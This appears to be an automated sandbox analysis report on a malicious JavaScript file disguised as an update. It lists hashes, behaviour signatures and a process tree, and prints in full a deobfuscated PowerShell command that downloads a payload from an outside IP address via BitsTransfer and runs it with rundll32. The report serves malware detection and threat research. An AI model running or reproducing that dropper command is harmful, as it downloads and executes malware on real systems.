Resubmissions

15-08-2024 20:42

240815-zhg3jaxglr 10

14-06-2024 12:05

240614-n89dxszekb 10

28-05-2024 22:27

240528-2dhvdagb62 10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-05-2024 22:27

General

  • Target

    Update_25_04_2024_3146918.js

  • Size

    135KB

  • MD5

    bf7f711e823916e5f56ff4d2286ee866

  • SHA1

    d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729

  • SHA256

    0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17

  • SHA512

    842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941

  • SSDEEP

    1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89

Signatures

  • Blocklisted process makes network request 18 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1152
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\4d3vott1.1ju,Start
          4⤵
          • Drops file in Windows directory
          PID:1244
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4340,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:8
    1⤵
      PID:2788
    • C:\Windows\system32\rundll32.exe
      C:\Windows\system32\rundll32.exe "C:\ProgramData\RtlUpd\RtlUpd.dll",Start /p
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:4632

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\RtlUpd\RtlUpd.dll

      Filesize

      141KB

      MD5

      039ff182524d1f3c109869d5bee699a1

      SHA1

      9da43496bcb967ce77f18ed8a3ee19d53661e242

      SHA256

      a5f16fa960fe0461e2009bd748bc9057ef5cd31f05f48b12cfd7790fa741a24e

      SHA512

      3654009a9785e45488bb14cecea88a7a232976f003a32a9d5856572e491c580046629a3f0b2c130a1022a196677b1695643f7e2a457203233ba08fb13639317e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x3rcz2ql.c2k.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1152-24-0x000001829F120000-0x000001829F146000-memory.dmp

      Filesize

      152KB

    • memory/1152-25-0x000001829F170000-0x000001829F184000-memory.dmp

      Filesize

      80KB

    • memory/4804-0-0x00007FFCBA7C3000-0x00007FFCBA7C5000-memory.dmp

      Filesize

      8KB

    • memory/4804-1-0x0000023DE0910000-0x0000023DE0932000-memory.dmp

      Filesize

      136KB

    • memory/4804-7-0x00007FFCBA7C0000-0x00007FFCBB281000-memory.dmp

      Filesize

      10.8MB

    • memory/4804-12-0x00007FFCBA7C0000-0x00007FFCBB281000-memory.dmp

      Filesize

      10.8MB

    • memory/4804-13-0x0000023DE0E20000-0x0000023DE0F96000-memory.dmp

      Filesize

      1.5MB

    • memory/4804-14-0x0000023DE11B0000-0x0000023DE13BA000-memory.dmp

      Filesize

      2.0MB

    • memory/4804-29-0x00007FFCBA7C0000-0x00007FFCBB281000-memory.dmp

      Filesize

      10.8MB